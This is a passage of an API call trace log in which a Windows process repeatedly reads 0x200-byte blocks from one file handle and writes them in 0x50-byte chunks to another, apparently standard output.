lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] GetFileType (hFile=0x50) returned 0x1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] GetFileType (hFile=0x50) returned 0x1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] GetFileType (hFile=0x50) returned 0x1 [0132.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.244] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] GetFileType (hFile=0x50) returned 0x1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.245] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.245] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.245] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0132.245] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] GetFileType (hFile=0x50) returned 0x1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] GetFileType (hFile=0x50) returned 0x1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] GetFileType (hFile=0x50) returned 0x1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] GetFileType (hFile=0x50) returned 0x1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] GetFileType (hFile=0x50) returned 0x1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] 
GetFileType (hFile=0x50) returned 0x1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] GetFileType (hFile=0x50) returned 0x1 [0132.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.245] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] GetFileType (hFile=0x50) returned 0x1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.246] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.246] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.246] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.246] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] GetFileType (hFile=0x50) returned 0x1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] GetFileType (hFile=0x50) returned 0x1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | 
out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] GetFileType (hFile=0x50) returned 0x1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] GetFileType (hFile=0x50) returned 0x1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] GetFileType (hFile=0x50) returned 0x1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] GetFileType (hFile=0x50) returned 0x1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] GetFileType (hFile=0x50) returned 0x1 [0132.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.246] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, 
lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] GetFileType (hFile=0x50) returned 0x1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.247] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.247] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] GetFileType (hFile=0x50) returned 0x1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] GetFileType (hFile=0x50) returned 0x1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] GetFileType (hFile=0x50) returned 0x1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] GetFileType (hFile=0x50) returned 0x1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 
[0132.247] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] GetFileType (hFile=0x50) returned 0x1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] GetFileType (hFile=0x50) returned 0x1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] GetFileType (hFile=0x50) returned 0x1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.247] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] GetFileType (hFile=0x50) returned 0x1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.248] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.248] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) 
returned 1 [0132.248] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] GetFileType (hFile=0x50) returned 0x1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] GetFileType (hFile=0x50) returned 0x1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] GetFileType (hFile=0x50) returned 0x1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] GetFileType (hFile=0x50) returned 0x1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] GetFileType (hFile=0x50) returned 0x1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.248] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0132.248] GetFileType (hFile=0x50) returned 0x1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] GetFileType (hFile=0x50) returned 0x1 [0132.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.248] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] GetFileType (hFile=0x50) returned 0x1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.249] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.249] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.249] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] GetFileType (hFile=0x50) returned 0x1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] GetFileType (hFile=0x50) returned 0x1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] GetFileType (hFile=0x50) returned 0x1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] GetFileType (hFile=0x50) returned 0x1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] GetFileType (hFile=0x50) returned 0x1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] GetFileType (hFile=0x50) returned 0x1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] GetFileType (hFile=0x50) returned 0x1 [0132.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.249] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, 
lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] GetFileType (hFile=0x50) returned 0x1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.250] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.250] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.250] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] GetFileType (hFile=0x50) returned 0x1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] GetFileType (hFile=0x50) returned 0x1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] GetFileType (hFile=0x50) returned 0x1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] GetFileType (hFile=0x50) returned 0x1 [0132.250] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] GetFileType (hFile=0x50) returned 0x1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] GetFileType (hFile=0x50) returned 0x1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] GetFileType (hFile=0x50) returned 0x1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] GetFileType (hFile=0x50) returned 0x1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.251] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.251] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.251] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] GetFileType (hFile=0x50) returned 0x1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] GetFileType (hFile=0x50) returned 0x1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] GetFileType (hFile=0x50) returned 0x1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] GetFileType (hFile=0x50) returned 0x1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] GetFileType (hFile=0x50) returned 0x1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, 
